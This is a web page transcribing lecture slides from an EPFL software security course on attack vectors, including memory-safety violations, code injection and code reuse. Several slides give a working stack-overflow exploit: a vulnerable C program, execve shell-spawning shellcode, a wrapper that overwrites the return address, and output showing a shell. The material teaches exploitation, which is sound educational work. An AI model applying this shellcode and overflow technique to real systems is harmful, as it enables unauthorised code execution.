cs412 software security
play

CS412 Software Security Attack Vectors Mathias Payer EPFL, Spring - PowerPoint PPT Presentation

Mar 24, 2023 •347 likes •831 views

CS412 Software Security Attack Vectors Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Exploitation: Disclaimer This section introduces software exploitation We will discuss both basic and advanced exploitation

  1. CS412 Software Security Attack Vectors Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security

  2. Exploitation: Disclaimer This section introduces software exploitation We will discuss both basic and advanced exploitation techniques We assume that the given software has (i) a security-relevant vulnerability and (ii) that we know this vulnerability Use this knowledge only on programs on your own machine It is illegal to exploit software vulnerabilities on remote machines without prior permission form the owner. Mathias Payer CS412 Software Security

  3. Eternal War in Memory Memory corruption is as old as operating systems and networks First viruses, worms, and trojan horses appeared with the rise of home computers (and networks) Malware abuses security violations, either user-based, hardware-based, or software-based Mathias Payer CS412 Software Security

  4. Malware strategies The Morris worm spread widely due to a set of exploits used to to gain code execution on a large part of the Internet in 1988 Dictionary attack against rsh/rexec Stack-based overflow in fingerd to spawn a shell Command injection into sendmail’s debug mode Check out the source code. Mathias Payer CS412 Software Security

  5. Attacker Goals Denial of Service (DoS) Leak information Code execution Privilege escalation Mathias Payer CS412 Software Security

  6. Attacker Goal: Denial of Service Prohibit legit use of a service by either causing abnormal service termination (e.g., through a segmentation fault) or overwhelming the service with a large number of duplicate/unnecessary requests so that legit requests can no longer be served. Mathias Payer CS412 Software Security

  7. Attacker Goal: Information Leak An abnormal transfer of sensitive information to the attacker. An information leak abuses an illegal, implicit, or unintended transfer of information to pass sensitive data to the attacker who should not have access to that data. Mathias Payer CS412 Software Security

  8. Attacker Goal: Code Execution Code execution allows the attacker to break out of the restricted computation available through the application and execute arbitrary code instead. This can be achieved by (i) injecting new code, or (ii) repurposing existing code through different means. Mathias Payer CS412 Software Security

  9. Attacker Goal: Privilege Escalation An unintended escalation and increase of privileges. An attacker gains higher privileges in an unintended way. An example of privilege escalation is gaining administrator privileges through a kernel bug or a bug in a privileged program. A common example is setting the is_admin flag. Mathias Payer CS412 Software Security

  10. Low level attack paths Figure 1: Mathias Payer CS412 Software Security

  11. Memory Safety and Type Safety Violations Low level attacks start with a memory or type safety violation Spatial memory safety is violated if an object is accessed out of bounds Temporal memory safety is violated if an object is no longer valid Type safety is violated if an object is cast and used as a different (incompatible) type Mathias Payer CS412 Software Security

  12. Software Attack Types Code execution Code Injection : inject new code into the process Code Reuse : reuse existing code in the process Control-Flow Hijacking : redirect control-flow to alternate targets Data Corruption : corrupt sensitive (privileged or important) data Information Leak : output sensitive data Mathias Payer CS412 Software Security

  13. Code Execution Code execution requires control over control flow. Attacker must overwrite a code pointer Return instruction pointer on the stack Function pointer Virtual table pointer Force program to dereference corrupted code pointer Mathias Payer CS412 Software Security

  14. Control-flow hijack attack Control-flow hijacking is an attack primitive that allows the adversary to redirect control flow to locations that would not be reached in a benign execution. Requirements: Knowledge of the location of the code pointer Knowledge of the code target Existing code and control-flow must use the compromised pointer. Mathias Payer CS412 Software Security

  15. Code Corruption This attack vector locates existing code and modifies it to execute the attacker’s computation. Requirements: Knowledge of the code location Area must be writable Program must execute that code on benign code path. Mathias Payer CS412 Software Security

  16. Code Injection Instead of modifying/overwriting existing code, inject new code into the address space of the process. Requirements: Knowledge of the location of a writable memory area Memory area must be executable Control-flow must be hijacked/redirected to injected code Construction of shellcode Mathias Payer CS412 Software Security

  17. Code Reuse Instead of injecting code, reuse existing code of the program. The main idea is to stitch together existing code snippets to execute new arbitrary behavior. Requirements: Knowledge of a writable memory area that contains invocation frames (gadget address and state such as register values) Knowledge of executable code snippets ( gadgets ) Control-flow must be hijacked/redirected to prepared invocation frames Construction of ROP payload This is also called Return-Oriented Programming (ROP), Jump-Oriented Programming (JOP), Call-Oriented Programming (COP), Counterfeit-Object Oriented Programming (COOP) for different aspects of code reuse. Mathias Payer CS412 Software Security

  18. End-to-end exploits Code injection on the stack Code injection on the heap Format string attack (multi stage attack) Type confusion Mathias Payer CS412 Software Security

  19. Code injection on the stack #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char* argv[]) { char cookie[32]; printf("Give me a cookie (%p, %p)\n", cookie, getenv("EGG")); strcpy(cookie, argv[1]); printf("Thanks for the %s\n", cookie); return 0; } Mathias Payer CS412 Software Security

  20. Code injection on the stack #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char* argv[]) { char cookie[32]; printf("Give me a cookie (%p, %p)\n", cookie, getenv("EGG")); strcpy(cookie, argv[1]); printf("Thanks for the %s\n", cookie); return 0; } The strcpy call copies a string into the stack buffer, potentially past the end of cookie . Mathias Payer CS412 Software Security

  21. Exploit strategy: stack-based Inject new code on the stack, hijack control-flow to injected code. Environment checksec ./stack : No canary; NX disabled; No PIE We will place executable code on the stack Option 1: in the buffer itself Option 2: higher up on the stack frame Option 3: in an environment variable We’ll use Option 3. The program leaks the information of an environment variable (how convenient)! Prepare exploit payload to open a shell ( shellcode ) Prepare a wrapper to set the execution parameters Mathias Payer CS412 Software Security

  22. Exploit payload: shell code int shell() { asm("\ needle: jmp gofar\n\ goback: pop %rdi\n\ xor %rax, %rax\n\ movb $0x3b, %al\n\ xor %rsi, %rsi\n\ xor %rdx, %rdx\n\ syscall\n\ gofar: call goback\n\ .string \"/bin/sh\"\n\ "); } gcc shellcode.c ; objdump -d a.out Neat trick: recover pointer to end of exploit by calling and returning. Mathias Payer CS412 Software Security

  23. Exploit: stack based The exploit consists of two stages: An environment variable ( EGG ) that contains the executable code. Buffer input that triggers the buffer overflow, overwriting the return instruction pointer to point to that code. Buffer input: str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + EGGLOC + 0x0 Note that EGGLOC must be in little endian. Mathias Payer CS412 Software Security

  24. Exploit wrapper: stack based Goal: control the environment #define BUFSZ 0x20 #define EGGLOC 0x7fffffffefd3 int main(int argc, char* argv[]) { char shellcode[] = "EGG=..."; // shellcode char buf[256]; // fill buffer + ebp with 0x41's for (int i=0; i <BUFSZ+ sizeof (void*); buf[i++]='A'); // overwrite RIP with eggloc char **buff = (char**)(&buf[BUFSIZE+ sizeof (void*)]); *(buff++) = (void*)EGGLOC; *buff = (void*)0x0; // setup execution environment and fire exploit char *args[3] = { "./stack", buf, NULL }; char *envp[2] = { shellcode, NULL}; execve("./stack", args, envp); return 0; } Mathias Payer CS412 Software Security

  25. Full stack exploit gannimo@lindwurm{0}$ setarch x86_64 -R ./stack-ci-wrapper Give me a cookie (0x7fffffffed10, 0x7fffffffefd3) Thanks for the AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA $ whoami gannimo $ exit Mathias Payer CS412 Software Security

  26. Code injection on the heap #include <stdio.h> #include <stdlib.h> #include <string.h> struct data { char buf[32]; void (*fct)(int); } *ptr; int main(int argc, char* argv[]) { ptr = ( struct data*)malloc( sizeof ( struct data)); ptr->fct = &exit; printf("Give me a cookie (at %p)\n", ptr); strcpy(ptr->buf, argv[1]); printf("Thanks for the %s\n", ptr->buf); ptr->fct(0); return 0; } Mathias Payer CS412 Software Security

  27. Code injection on the heap Similar to the stack example, data is copied into a bounded buffer. Next to the buffer is a code pointer. An attacker can overwrite this code pointer through the buffer overflow. Mathias Payer CS412 Software Security

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

CS412 Software Security Mitigations Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Mitigations Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Mitigations Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Model for Control-Flow Hijack Attacks Figure 1 Mathias Payer CS412 Software Security Widely-adopted defense mechanisms Hundreds of

1.34k views • 57 slides
CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Web (and internet) security: two views Just a long running network service Complex application with multiple layers and components.

577 views • 47 slides
CS412 Software Security Security Policies Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Security Policies Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Security Policies Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Security Policies A policy is a deliberate system of principles to guide decisions and achieve rational outcomes. A policy is a

532 views • 41 slides
CS412 Software Security Basic Principles Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Basic Principles Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Basic Principles Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Software Security Allow intended use of software, prevent unintended use that may cause harm. Mathias Payer CS412 Software

735 views • 36 slides
CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Software liveliness Software is not a one-shot effort Software development, production, and maintenance are cost/labor

449 views • 23 slides
CS412 Software Security Advanced Mitigations Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Advanced Mitigations Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Advanced Mitigations Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Model for Control-Flow Hijack Attacks Figure 1: Mathias Payer CS412 Software Security Advanced mitigations Stack integrity

298 views • 26 slides
CS412 Software Security Mobile Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Mobile Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Mobile Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Mobile computing You are tasked in developing a mobile computing system. What features do you need? How do you ensure device

383 views • 24 slides
CS412 Software Security Reverse Engineering Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Reverse Engineering Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Reverse Engineering Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Basics: encodings Code is data is code is data Learn to read hex numbers: 0x38 == 0011'1000 Python: hex(int('00111000', 2))

696 views • 54 slides
CS412 Software Security Software Bugs Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Software Bugs Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Software Bugs Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security From Software Bugs to Attack Primitives Attack primitives are exploit building blocks Software bugs map to attack primitives , i.e.,

512 views • 23 slides
CS412 Software Security Program Testing Fuzzing Mathias Payer EPFL, Spring 2019 Mathias

CS412 Software Security Program Testing Fuzzing Mathias Payer EPFL, Spring 2019 Mathias

CS412 Software Security Program Testing Fuzzing Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Why testing? Testing is the process of executing a program to find errors. An error is a deviation between observed

657 views • 39 slides
CS412 Software Security Program Testing Sanitization Mathias Payer EPFL, Spring 2019

CS412 Software Security Program Testing Sanitization Mathias Payer EPFL, Spring 2019

CS412 Software Security Program Testing Sanitization Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Why testing? Testing is the process of executing a program to find errors. An error is a deviation between

503 views • 28 slides
deel 2 sws1 1 Software and Web Security - 1 &amp; 2 Software is the main source of security

deel 2 sws1 1 Software and Web Security - 1 &amp; 2 Software is the main source of security

Software and Web Security deel 2 sws1 1 Software and Web Security - 1 &amp; 2 Software is the main source of security vulnerabilities esp in systems accessible via a network part 1 security problems in machine code, compiled from C(++)

1.35k views • 67 slides
Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software

Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software

1 Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software is the main source of security vulnerabilities esp in systems accessible via a network i t ibl i t k part 1 part 1 security problems

672 views • 65 slides
Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software

Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software

Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software Engineering Spring 2012 What is the talk NOT about? Cryptography. Database security. Operating Systems security. Network security.

1.37k views • 121 slides
Software Security: Defenses &amp; Principles CS 161: Computer Security Prof. Vern Paxson TAs:

Software Security: Defenses &amp; Principles CS 161: Computer Security Prof. Vern Paxson TAs:

Software Security: Defenses &amp; Principles CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed &amp; Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ January 25, 2011 Testing for Software Security Issues

444 views • 42 slides
Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust

Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust

Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust Boundary Attacks Threats Application Attacker Exploit Vulnerability : a software defect with security consequences Threat : a potential danger to

1.54k views • 80 slides
Org-mode Nick Higham April 22, 2013 Nick Higham Org-mode 1 / 7 University of Manchester What

Org-mode Nick Higham April 22, 2013 Nick Higham Org-mode 1 / 7 University of Manchester What

Org-mode Nick Higham April 22, 2013 Nick Higham Org-mode 1 / 7 University of Manchester What is Org Mode? Emacs mode for note taking task management tables and spreadsheets producing L A T EX documents and web pages literate

212 views • 7 slides
Fantastic Attacks and How Kalipso can find them Kamila Babayeva Sebastian Garcia

Fantastic Attacks and How Kalipso can find them Kamila Babayeva Sebastian Garcia

Fantastic Attacks and How Kalipso can find them Kamila Babayeva Sebastian Garcia babaykam@fel.cvut.cz, @_kamifai_ sebastian.garcia@agent.fel.cvut.cz, @eldracote What if you need to analyze a very large pcap to find if there was an

472 views • 32 slides
NoSQL: HBase and Neo4j A.A. 2019/20 Fabiana Rossi Laurea Magistrale in Ingegneria Informatica -

NoSQL: HBase and Neo4j A.A. 2019/20 Fabiana Rossi Laurea Magistrale in Ingegneria Informatica -

Macroarea di Ingegneria Dipartimento di Ingegneria Civile e Ingegneria Informatica NoSQL: HBase and Neo4j A.A. 2019/20 Fabiana Rossi Laurea Magistrale in Ingegneria Informatica - II anno The reference Big Data stack High-level Interfaces

658 views • 45 slides
Bullet Cache Balancing speed and usability in a cache server Ivan Voras

Bullet Cache Balancing speed and usability in a cache server Ivan Voras

Bullet Cache Balancing speed and usability in a cache server Ivan Voras &lt;ivoras@freebsd.org&gt; What is it? People know what memcached is... mostly Example use case: So you have a web page which is just dynamic enough so you

657 views • 40 slides
Insight What were the 6 things from last weeks lecture that insight leads to? WHAT DOES

Insight What were the 6 things from last weeks lecture that insight leads to? WHAT DOES

6/16/2015 2015 VisREU Site Agenda Introduction to Scientific Introduction to SciVis (High level) Visualization Using Visualization Applications Introducing ParaView Hands-on Test Drive Vetria L. Byrd, Director Advanced

269 views • 15 slides
in External DSLs WGT 2011 Markus Voelter Independent/itemis

in External DSLs WGT 2011 Markus Voelter Independent/itemis

The State of the Art in External DSLs WGT 2011 Markus Voelter Independent/itemis voelter@acm.org A li%le History DSLs Example: Fountains

1.02k views • 78 slides
PriorityQueue

PriorityQueue

PriorityQueue

574 views • 4 slides
Welcome to CSE21! Lecture B Miles Jones MWF 9-9:50pm PCYN 109 Lecture D Russell (Impagliazzo)

Welcome to CSE21! Lecture B Miles Jones MWF 9-9:50pm PCYN 109 Lecture D Russell (Impagliazzo)

Welcome to CSE21! Lecture B Miles Jones MWF 9-9:50pm PCYN 109 Lecture D Russell (Impagliazzo) MWF 4-4:50am Center 101 http://cseweb.ucsd.edu/classes/sp16/cse21-bd/ March 30, 2016 Sorting (or Ordering) Section 3.1 in Rosen vs. * Assume

518 views • 39 slides

More recommend